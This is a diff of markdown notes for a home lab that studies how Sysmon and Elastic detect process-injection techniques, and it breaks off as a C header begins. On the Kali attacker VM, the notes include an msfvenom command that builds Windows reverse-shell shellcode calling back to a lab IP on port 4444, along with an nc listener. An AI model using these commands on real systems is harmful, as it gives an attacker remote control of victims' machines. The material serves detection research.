j33k3k/sysmonProcessInjection/sysmonInjectionAnalysis.md

 ## Lab setup
-1. Windows Host running ELK in WSL with local FW rules to push traffic to the host -> WSL
+1. Windows Host running ELK in WSL with local FW rules to push traffic to through host to WSL
-2. Windows VM with Elastic Agent, Sysmon and sysmonconfig-olaf-filedelete.xml on bridged network
+2. Windows 11 in VirtualBox with Elastic Agent, Sysmon and sysmonconfig-olaf-filedelete.xml on bridged network
-3. Kali VM as attacking machine on bridged network
+4. Kali VM as attacking machine on bridged network

-## Init common header with shellcode
+### Initialize common.h header with shellcode
 On Kali run:
 - msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.32.49 LPORT=4444 -f c -b \x00\x0a\x0d
 - nc -lvnp 4444

-## Sysmon conf updates
-- In EiD 10 exclude source image is "C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe" and contains "elastic-otel-collector.exe"

-Then common header used in several of the techniques
+Then common header used for several of the techniques
 ```
 #pragma once
 #include <Windows.h>